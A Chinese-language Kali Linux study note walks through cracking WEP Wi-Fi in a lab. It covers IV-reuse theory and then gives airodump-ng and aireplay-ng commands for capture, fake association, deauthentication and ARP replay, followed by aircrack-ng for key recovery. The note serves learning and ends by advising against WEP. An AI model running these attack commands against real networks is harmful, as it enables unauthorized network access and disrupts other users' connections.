Kali linux 学习笔记(三十三)无线渗透——WEP攻击 2020.3.12

前言

本节学习针对WEP的攻击
虽然用WEP的机器很少了
但有些企业还在用

1、WEP共享秘钥破解

  • 原理:IV并非完全随机,每224个包可能出现一次IV重用,收集大量IV可以分析得出密码
  • ARP回包中包含IV
  • IV足够多的情况下,任何复杂程度的WEP密码都可以破解

2、过程

  • 启动monitor模式,侦听
  • 启动抓包并保存抓包
  • deauthentication抓取XOR文件
  • 用XOR文件与AP建立关联
  • ARP重放攻击
  • deauthentication触发ARP数据包
  • 收集足够Data后破解密码

3、实践

  • 目标机:kifi
  • 攻击机:kali
  • AP:TP-link

设置AP为WEP加密,信道11

kali机tmux分窗

窗口1 侦听抓包

airodump-ng -c 11 --bssid EC:26:CA:DC:29:B6 -w wep wlan0mon 
#-c指定信道,--bssid指定侦听的AP,-w写入wep文件

窗口2 关联AP

aireplay -1 60 -e kifi -y wep-01-EC-26-CA-DC-29-B6.xor -a EC:26:CA:DC:29:B6 -h 0B-57-00-0C-96-68
#-1表示关联,每60s发一次,-e指定目标机,-y指定密钥文件(抓取下来的),-a指定AP,-h指定自己的MAC

窗口3 进行攻击

aireplay-ng -0 1 -a EC:26:CA:DC:29:B6 -c 68:3E:34:30:0F:AA wlan0mon 
#deauthentication攻击让他重连,来尽可能多的抓包,-0指定攻击次数,-a指定AP,-c指定客户端
aireplay-ng -3 -b EC:26:CA:DC:29:B6 -h 0B:57:00:0C:96:68
#-3指定重放攻击,-b指定AP,-h是自己

在获取了足够的Data后(几十万)
进行密码破解

aircrack-ng wep-01.cap #wep这个文件就是抓包,包括上面重放的,可以用wireshark打开看看

结语

WEP攻击较为简单
作为安全维护员尽量不要使用WEP安全系统

你可能感兴趣的:(kali,linux)